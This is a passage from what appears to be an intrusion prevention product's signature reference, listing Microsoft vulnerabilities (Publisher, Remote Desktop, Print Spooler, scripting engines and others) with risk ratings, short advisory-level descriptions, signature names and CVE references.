http://www.securityfocus.com/bid/30554
MS08-051
http://technet.microsoft.com/security/bulletin/MS08-051
Back to top

Microsoft-PowerShell-Remoting-Tabexpansion-Sandbox-Bypass

About this vulnerability: A vulnerability in Microsoft PowerShell
Risk: High
First detected in: sgpkg-ips-1550-5242
Last changed: sgpkg-ips-1550-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A sandbox bypass vulnerability has been reported for Microsoft PowerShell. This vulnerability is due to exposure of a dangerous function in the TabExpansion function loaded from a PowerShell Remoting session. A remote, authenticated attacker can exploit this vulnerability by sending a crafted packet to the target server. Successful exploitation could result in execution of arbitrary code in the security context of the user running the service.
Situation: File-TextId_Microsoft-PowerShell-Remoting-Tabexpansion-Sandbox-Bypass
References:
CVE-2022-41076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41076
ms22-dec
http://technet.microsoft.com/security/bulletin/ms22-dec
Back to top

Microsoft-Print-Service-Impersonation-CVE-2010-2729

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows Print Spooler service.
Situation: MSRPC-TCP_CPS-Microsoft-Print-Service-Impersonation-CVE-2010-2729
MSRPC-TCP_CPS-Microsoft-Print-Service-Usage-CVE-2010-2729
References:
CVE-2010-2729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2729
BID-43073
http://www.securityfocus.com/bid/43073
OSVDB-67988
http://www.osvdb.org/67988
MS10-061
http://technet.microsoft.com/security/bulletin/MS10-061
Back to top

Microsoft-Print-Spooler-Service-RpcGetPrinterData-Function-DoS

About this vulnerability: Denial of service vulnerability in Microsoft Print Spooler services GetPrinterData function
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: <os>
Type: Malfunction
Description: Certain versions of Microsoft Print Spooler service suffer from a denial of service vulnerability where the server's memory can be exhausted with a malicious MSRPC GetPrinterData function call. Remote attackers can specify an arbitrary large 'offered' value in an MSRPC request to the service, causing the server to use all available memory while trying to allocate the requested amount of space.
Situation: MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-RpcGetPrinterData-Function-DoS
References:
CVE-2006-6296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6296
BID-21401
http://www.securityfocus.com/bid/21401
Back to top

Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Windows and Microsoft Office products. The vulnerability is due to improper input validation of a table in the TrueType font layout. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target system by enticing a target user to open a maliciously crafted document. In situations where code execution is successful the injected code will run within the security context of the currently logged-on user.
Situation: HTTP_SS-Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption
File-Binary_Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption
References:
CVE-2010-2738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2738
BID-43068
http://www.securityfocus.com/bid/43068
MS10-063
http://technet.microsoft.com/security/bulletin/MS10-063
Back to top

Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955

About this vulnerability: A vulnerability in Microsoft Publisher
Risk: High
First detected in: sgpkg-ips-364-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher 2002
Type: Malfunction
Description: There is a vulnerability in Microsoft Publisher.
Situation: HTTP_SS-Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955
File-OLE_Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955
References:
CVE-2010-3955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3955
MS10-103
http://technet.microsoft.com/security/bulletin/MS10-103
Back to top

Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Publisher
Risk: High
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher 2002; Microsoft Publisher 2003; Microsoft Publisher 2007
Type: Input Validation
Description: There is a vulnerability in Microsoft Publisher.
Situation: HTTP_SS-Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow
File-OLE_Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow
References:
CVE-2010-0479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0479
MS10-023
http://technet.microsoft.com/security/bulletin/MS10-023
Back to top

Microsoft-Publisher-Invalid-Pointer-CVE-2011-3411

About this vulnerability: A vulnerability in Microsoft Publisher
Risk: High
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher 2003
Type: Malfunction
Description: There is a vulnerability in Microsoft Publiser.
Situation: File-OLE_Microsoft-Publisher-Invalid-Pointer-CVE-2011-3411
References:
CVE-2011-3411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3411
MS11-091
http://technet.microsoft.com/security/bulletin/MS11-091
Back to top

Microsoft-Publisher-Memory-Corruption-CVE-2011-3412

About this vulnerability: A vulnerability in Microsoft Publisher
Risk: High
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher 2003; Microsoft Publisher 2007
Type: Malfunction
Description: There is a vulnerability in Microsoft Publiser.
Situation: File-OLE_Microsoft-Publisher-Memory-Corruption-CVE-2011-3412
References:
CVE-2011-3412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3412
MS11-091
http://technet.microsoft.com/security/bulletin/MS11-091
Back to top

Microsoft-Publisher-Out-Of-Bounds-Array-Index-CVE-2011-3410

About this vulnerability: A vulnerability in Microsoft Publisher
Risk: High
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher 2003; Microsoft Publisher 2007
Type: Malfunction
Description: There is a vulnerability in Microsoft Publiser.
Situation: File-OLE_Microsoft-Publisher-Out-Of-Bounds-Array-Index-CVE-2011-3410
References:
CVE-2011-3410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3410
MS11-091
http://technet.microsoft.com/security/bulletin/MS11-091
Back to top

Microsoft-Publisher-Pubconv.dll-Function-Pointer-Overwrite

About this vulnerability: A vulnerability in Microsoft Office Publisher
Risk: Moderate
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Publisher, a component of Microsoft Office, that could allow a remote attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to an error in the pubconv.dll library during the handling of Microsoft Publisher files that allows control of a function pointer. Remote attackers could exploit this vulnerability by enticing the target user to insert a malicious Publisher file into another Publisher document. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged in user. An unsuccessful attempt will terminate the affected application abnormally.
Situation: File-OLE_Microsoft-Publisher-Pubconv.dll-Function-Pointer-Overwrite
References:
CVE-2011-1508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1508
BID-50090
http://www.securityfocus.com/bid/50090
OSVDB-76460
http://www.osvdb.org/76460
MS11-091
http://technet.microsoft.com/security/bulletin/MS11-091
Back to top

Microsoft-Publisher-Security-Features-Bypass-CVE-2024-38226

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Publisher detected
Risk: High
First detected in: sgpkg-ips-1775-5242
Last changed: sgpkg-ips-1775-5242
Platform: Windows
Software: Microsoft Publisher; Microsoft Office
Type: Input Validation
Description: Microsoft Publisher's security features bypass Vulnerability.
Situation: File-OLE_Microsoft-Publisher-Document-With-Suspicious-VBA-Script
References:
CVE-2024-38226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38226
ms24-sep
http://technet.microsoft.com/security/bulletin/ms24-sep
Back to top

Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569

About this vulnerability: A vulnerability in Microsoft Publisher
Risk: High
First detected in: sgpkg-ips-363-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher 2002; Microsoft Publisher 2007
Type: Malfunction
Description: There is a vulnerability in Microsoft Publisher.
Situation: HTTP_SS-Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569
File-OLE_Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569
References:
CVE-2010-2569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2569
MS10-103
http://technet.microsoft.com/security/bulletin/MS10-103
Back to top

Microsoft-Remote-Administration-Protocol-Heap-Overflow-Vulnerability

About this vulnerability: A vulnerability in Microsoft Remote Administration Protocol
Risk: High
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Remote Administration Protocol.
Situation: SMB-TCP_Microsoft-Remote-Administration-Protocol-Multiple-Vulnerabilities
References:
CVE-2012-1852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1852
BID-54931
http://www.securityfocus.com/bid/54931
OSVDB-84600
http://www.osvdb.org/84600
MS12-054
http://technet.microsoft.com/security/bulletin/MS12-054
Back to top

Microsoft-Remote-Administration-Protocol-Stack-Overflow-Vulnerability

About this vulnerability: A vulnerability in Microsoft Remote Administration Protocol
Risk: High
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Remote Administration Protocol.
Situation: SMB-TCP_Microsoft-Remote-Administration-Protocol-Multiple-Vulnerabilities
References:
CVE-2012-1853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1853
BID-54940
http://www.securityfocus.com/bid/54940
OSVDB-84601
http://www.osvdb.org/84601
MS12-054
http://technet.microsoft.com/security/bulletin/MS12-054
Back to top

Microsoft-Remote-Desktop-Connection-Manager-Xml-External-Entity-Injection

About this vulnerability: A vulnerability in Microsoft Remote Desktop Connection Manager
Risk: Moderate
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Remote Desktop Connection Manager
Type: Input Validation
Description: Improper validation of RDG files causes an external entity injection vulnerability in Microsoft Remote Desktop Connection Manager. A successful exploit may allow an attacker to gain access to information on the target system.
Situation: File-Text_Microsoft-Remote-Desktop-Connection-Manager-Xml-External-Entity-Injection
References:
CVE-2020-0765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0765
Back to top

Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2011-0029

About this vulnerability: A vulnerability in Microsoft Remote Desktop
Risk: High
First detected in: sgpkg-ips-380-4219
Last changed: sgpkg-ips-1638-5242
Platform: Windows
Software: Microsoft Remote Desktop Client
Type: Malfunction
Description: There is a vulnerability in Microsoft Remote Desktop.
Situation: HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS-Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2010-0029
References:
CVE-2011-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0029
BID-46678
http://www.securityfocus.com/bid/46678
OSVDB-71014
http://www.osvdb.org/71014
MS11-017
http://technet.microsoft.com/security/bulletin/MS11-017
Back to top

Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044

About this vulnerability: Clientside remote code execution vulnerability in Remote Desktop
Risk: High
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A client side vulnerability exists in Microsotf Remote Desktop Software. If a user connects to a malicious HTTP-server, the remote server can trigger the vulnerability in the ActiveX component and execute arbitrary code in the victim's computer
Situation: HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
HTTP_SS-Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
References:
CVE-2009-1929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1929
BID-35973
http://www.securityfocus.com/bid/35973
OSVDB-56912
http://www.osvdb.org/56912
MS09-044
http://technet.microsoft.com/security/bulletin/MS09-044
Back to top

Microsoft-Remote-Desktop-Web-Access-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2008 R2
Software: <os>
Type: Input Validation
Description: A cross-site scripting vulnerability exists in Microsoft Remote Desktop Web Access. The vulnerability is due to insufficient validation of user-supplied input in login.asp. A remote attacker can exploit this flaw by enticing a target to open a malicious URL link. Successful exploitation would result in execution of script code in the user's browser session, in the security context of the affected Web site.
Situation: HTTP_CSU-Microsoft-Remote-Desktop-Web-Access-Cross-Site-Scripting
References:
CVE-2011-1263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1263
BID-49040
http://www.securityfocus.com/bid/49040
OSVDB-74406
http://www.osvdb.org/74406
MS11-061
http://technet.microsoft.com/security/bulletin/MS11-061
Back to top

Microsoft-Report-Viewer-Control-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Report Viewer
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Report Viewer; Microsoft Visual Studio
Type: Input Validation
Description: A cross-site scripting vulnerability exists in Microsoft Report Viewer. The vulnerability is due to an input validation error in the Report Viewer control while processing the TimerMethod parameter. An attacker can exploit this vulnerability to execute script code in a target user's browser within the context of the affected website.
Situation: HTTP_CRL-Microsoft-Report-Viewer-Control-Cross-Site-Scripting
References:
CVE-2011-1976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1976
OSVDB-74396
http://www.osvdb.org/74396
MS11-067
http://technet.microsoft.com/security/bulletin/MS11-067
Back to top

Microsoft-Report-Viewer-XSS-Vulnerability-CVE-2011-1976

About this vulnerability: An attempt to exploit vulnerability in Microsoft Report Viewer detected
Risk: Moderate
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Report Viewer; Microsoft Visual Studio
Type: Cross-site Scripting
Description: A vulnerability in Microsoft Report Viewer Components
Situation: HTTP_CSU-Microsoft-Report-Viewer-XSS-Vulnerability-CVE-2011-1976
References:
CVE-2011-1976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1976
MS11-067
http://technet.microsoft.com/security/bulletin/MS11-067
Back to top

Microsoft-Rich-Textbox-Control-Savefile-Insecure-Method-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in Microsoft Visual Studio
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Studio
Type: Malfunction
Description: There is a file overwriting vulnerability in Microsoft Rich Textbox Control ActiveX control. The flaw is due to a lack of path verification in the control's SaveFile method. A remote attacker may exploit this vulnerability via a specially crafted web page to create or modify arbitrary files on the target system.
Situation: File-Text_MS-Rich-Textbox-Control-Insecure-Method-Arbitrary-File-Overwrite
References:
CVE-2008-0237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0237
BID-27201
http://www.securityfocus.com/bid/27201
Back to top

Microsoft-Schannel-CVE-2010-3229

About this vulnerability: A Microsoft Schannel vulnerability
Risk: High
First detected in: sgpkg-ips-347-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability exists in Microsoft Schannel.
Situation: HTTPS_CS-Schannel-CVE-2010-3229
References:
CVE-2010-3229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3229
BID-43780
http://www.securityfocus.com/bid/43780
MS10-085
http://technet.microsoft.com/security/bulletin/MS10-085
Back to top

Microsoft-Scripting-Engine-CVE-2016-0189-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer's VBScript and JScript engines.
Situation: File-Text_Microsoft-Scripting-Engine-CVE-2016-0189-Memory-Corruption
References:
CVE-2016-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189
MS16-053
http://technet.microsoft.com/security/bulletin/MS16-053
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0834

About this vulnerability: A vulnerability in Miscrosoft Edge
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0834
References:
CVE-2018-0834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0834
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0835

About this vulnerability: A vulnerability in Miscrosoft Edge
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0835
References:
CVE-2018-0835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0835
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0837

About this vulnerability: A vulnerability in Miscrosoft Edge
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0837
References:
CVE-2018-0837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0837
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0838

About this vulnerability: A vulnerability in Miscrosoft Edge
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0838
References:
CVE-2018-0838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0838
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0840

About this vulnerability: A vulnerability in Miscrosoft Edge
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0840
References:
CVE-2018-0840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0840
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0858

About this vulnerability: A vulnerability in ChakraCore
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ChakraCore
Type: Input Validation
Description: There exists a memory corruption vulnerability in the ChakraCore scripting engine. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0858
References:
CVE-2018-0858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0858
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0860

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0860
References:
CVE-2018-0860
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0860
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8229

About this vulnerability: A vulnerability in Chakra Scripting Engine
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Chakra Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8229
References:
CVE-2018-8229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8229
ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8266

About this vulnerability: A vulnerability in Chakra Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Chakra Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8266
References:
CVE-2018-8266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8266
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8353

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8353
References:
CVE-2018-8353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8353
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8355

About this vulnerability: A vulnerability in Chakra Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Chakra Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8355
References:
CVE-2018-8355
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8355
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8371

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8371
References:
CVE-2018-8371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8371
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8372

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Microsoft Browsers. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8372
References:
CVE-2018-8372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8372
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8384

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8384
References:
CVE-2018-8384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8384
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8387

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8387
References:
CVE-2018-8387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8387
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8389

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8389
References:
CVE-2018-8389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8389
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8403

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Microsoft Browsers. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8403
References:
CVE-2018-8403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8403
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2024-38178

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1763-5242
Last changed: sgpkg-ips-1763-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability leading to unauthenticated remote code execution has been reported in Microsoft Windows Scripting Engine.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2024-38178
References:
CVE-2024-38178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38178
ms24-aug
http://technet.microsoft.com/security/bulletin/ms24-aug
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1001

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1001
References:
CVE-2019-1001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1001
Back to top

Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1004

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
